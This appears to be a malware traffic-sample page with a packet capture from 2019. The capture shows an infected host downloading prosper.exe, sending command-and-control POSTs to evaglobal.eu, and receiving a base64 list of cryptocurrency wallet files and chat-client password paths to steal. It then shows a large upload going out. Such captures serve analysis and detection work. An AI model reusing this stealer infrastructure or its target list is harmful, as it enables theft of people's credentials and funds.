Text Example

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

Download Attachments

  • 1 pcap prosper
    Date added: May 30, 2019 7:30 am Added by: admin File size: 5 MB Downloads: 80

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1
E…..@…..
.
.
.
..!.PUITh>.2gP.@).$..GET /prosper.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1
E..<..@…8.
.
..8…”.P…..!C.P…….POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-30 00:42:15.211255 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 7301:8379, ack 276, win 30016, length 1078: HTTP
E .^..@.3..$.8..
.
..P.”.!|....P.u@....s.B.t$v.....4f....'a..'...Gx..].......!..\.H..Q"......kb..2...h.6....g.....~A?....JbW.GY.S...1..CiG..A.........U.....eY;...x...g.......X..*.....?.a~R..o.......a.O......8..Xe.._. ...-.....n....Rf1q ..e...$..,.;..f.e..Rxo.N.._. ..9..Lw.......I+R.U..,.~..[bc N....x..Obt. ..b.;...81Z...V.....;4X .._.<...|1c ..l....?^SY)..i.Y....W I....x....0f<..k....Xom.T..q....h. {/....c..[. +U....m..Re1I ..l....%Fi.H....x..TfeEi....,..|;.i...i.&D....i;..o....=;.i0.Gn..].Q...r[...".L.......?U...s/...n.#Ux..,...n\.&l..?..\X.....w.A....4.].q..f./...=.s...J....tjd.._. .N.a..j.HN....l.]...._r+..(...i..Y....,.PYU_..1......^v....U...…=LIR2u.J/..F..UI…”.0A..K……o.;nb……X|$r..Jyi...$..^..Yr….[.pr..>Z……… .o…k;…z.i.. .X5..:…….X9…….h..l,..L….{{ .z2..K’rn…X1..:….> .. ..f. ..<.7};..m…,…=’…h.’di#….o..Ndf….D….>.$%S….c…Yo.N.. .x..Tha.….d..T.y.*.hyYFb..Gs0…A.<..>^.w>..(.Ib..J.WR….#..Og..S….c…ho……o…{r.^….#..^yo.U….c..XytFY.._.
..;
2019-05-30 00:42:17.098581 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 4477439:4478073, ack 276, win 30016, length 634: HTTP
E ….@.3….8..
.
..P.”.e……P.u@p…mNoZWNrcG9pbnRzLG1iaGQuc3B2Y2hhaW4sbWJoZC55YW1sDQoud2FsbGV0DQp3YWxsZXRzXC53YWxsZXQNCndhbGxldC5kYXQNCndhbGxldHNcd2FsbGV0LmRhdA0KZWxlY3RydW0uZGF0DQp3YWxsZXRzXGVsZWN0cnVtLmRhdA0KU29mdHdhcmVcbW9uZXJvLXByb2plY3RcbW9uZXJvLWNvcmUNCndhbGxldF9wYXRoDQpCaXRjb2luXEJpdGNvaW4tUXQNCkJpdGNvaW5Hb2xkXEJpdGNvaW5Hb2xkLVF0DQpCaXRDb3JlXEJpdENvcmUtUXQNCkxpdGVjb2luXExpdGVjb2luLVF0DQpCaXRjb2luQUJDXEJpdGNvaW5BQkMtUXQNCiVBUFBEQVRBJVxFeG9kdXMgRWRlblwNCiVBcHBkYXRhJVxQc2krXHByb2ZpbGVzXA0KJUFwcGRhdGElXFBzaVxwcm9maWxlc1wNCjxyb3N0ZXItY2FjaGU+DQo8L3Jvc3Rlci1jYWNoZT4NCjxqaWQgdHlwZT0iUVN0cmluZyI+DQo8cGFzc3dvcmQgdHlwZT0iUVN0cmluZyI+DQo8L3Bhc3N3b3JkPg==
0

2019-05-30 00:42:21.556290 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 276:445, ack 4478073, win 64240, length 169: HTTP: POST /prosper/index.php HTTP/1.1
E…..@…2.
.
..8…”.P…..e.pP…. ..POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 44579
Cache-Control: no-cache

Leave a Reply